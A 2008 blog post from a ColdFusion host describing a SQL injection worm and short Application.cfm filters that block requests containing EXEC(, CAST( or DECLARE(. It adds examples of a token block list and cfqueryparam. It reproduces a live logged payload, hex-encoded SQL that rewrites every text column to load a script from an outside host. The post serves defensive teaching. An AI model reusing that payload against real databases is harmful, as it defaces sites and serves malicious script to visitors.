Coldfusion trick for stopping SQL Injection

December 4th, 2008

A while back, there was an internet worm, or an extremely prodigious hacker, hacking sites through SQL injection to place links to a Chinese spam site. It was really frustrating, because it targeted ColdFusion sites and we host a lot of those.

Here’s an example of how these attacks looked in the logfiles:

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Well, we ended up finding two lines to place into our Application.cfm files to stop it. Basically, it looks at the script name, path info and query string of each request and aborts if it finds an EXEC or CAST in any of them. Simple and effective:

<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

I paste that line in a few times and change "EXEC(" to "CAST(" and "DECLARE(", and to anything else that happens to be something I'm not going to use and might be dangerous.
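The same check, written once as a loop over a token list instead of pasting the cfif line several times. This is an added example and not the post's own code: the token list, the log file name and the 400 response are assumptions. Two details go beyond the one-liner above: the query string is also checked after urlDecode(), since the logged request carries an encoded space between DECLARE and @S (so "DECLARE @" only matches the decoded copy, and "DECLARE(" would not match it at all), and a cflog line records what was blocked so the list can be tuned from the logs rather than guessed.

```cfml
<!--- Added example for the top of Application.cfm; not the post's own code.
      Token list, log file name and response code are assumptions. --->
<cfset blockedTokens = ["EXEC(", "CAST(", "DECLARE @", "CHAR(4000)"]>

<!--- Raw CGI values first (the logged attack kept EXEC( and CAST( unencoded),
      plus a URL-decoded copy of the query string so a token that arrives
      percent-encoded is still seen. --->
<cfset suspectStrings = [
    cgi.SCRIPT_NAME,
    cgi.PATH_INFO,
    cgi.QUERY_STRING,
    urlDecode(cgi.QUERY_STRING)
]>

<cfset hit = "">
<cfloop array="#suspectStrings#" index="candidate">
    <cfloop array="#blockedTokens#" index="token">
        <!--- CFML's "contains" is case-insensitive: exec( and EXEC( both match --->
        <cfif candidate contains token>
            <cfset hit = token>
            <cfbreak>
        </cfif>
    </cfloop>
    <cfif len(hit)><cfbreak></cfif>
</cfloop>

<cfif len(hit)>
    <!--- Record the blocked request before aborting; the log file is what
          you grep when deciding whether a token produces false positives --->
    <cflog file="sqli_blocked" type="warning"
           text="Blocked token [#hit#] from #cgi.REMOTE_ADDR# on #cgi.SCRIPT_NAME#?#cgi.QUERY_STRING#">
    <cfheader statuscode="400" statustext="Bad Request">
    <cfabort>
</cfif>
```

The array loop and array literal syntax need ColdFusion 8 or later; on older servers replace the literals with arrayNew(1) and arrayAppend() calls.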

The real solution, of course, is to write good code. Use cfqueryparam with maxlength set. Best practices are something I can use when I code, but as we host code that our users write or download, it's impossible for me to make sure all of their code is secure. I can, however, write a few lines into the top of their Application.cfm files to protect our SQL servers.
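What "use cfqueryparam with maxlength set" looks like in practice, as an added example rather than code from the post: the vulnerable query pastes a URL value into the SQL text, which is exactly how the logged DECLARE/CAST/EXEC request gets executed; the hardened query sends the value as a bound parameter. The table, column and datasource names are assumptions.

```cfml
<!--- Added example, not from the post. Table, columns and datasource are assumptions. --->
<cfparam name="url.id" default="0">
<cfparam name="url.q" default="">

<!--- Vulnerable form: url.id becomes part of the SQL statement, so a value
      ending in ;DECLARE @S ... EXEC(@S) runs as SQL on the server --->
<cfquery name="getProductUnsafe" datasource="myDsn">
    SELECT id, name, price
    FROM products
    WHERE id = #url.id#
</cfquery>

<!--- Hardened form: each value travels as a parameter, never as SQL text.
      cfsqltype makes ColdFusion reject a non-integer before the query runs,
      and maxlength bounds the string parameter so a 4000-character payload
      is refused outright instead of being handed to the database --->
<cfquery name="getProduct" datasource="myDsn">
    SELECT id, name, price
    FROM products
    WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
      AND name LIKE <cfqueryparam value="%#url.q#%" cfsqltype="cf_sql_varchar" maxlength="50">
</cfquery>
```

With the parameterised version, a request such as ?id=1;DECLARE... fails validation of the cf_sql_integer parameter and never reaches the database, so the Application.cfm filter above becomes a second layer rather than the only one.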
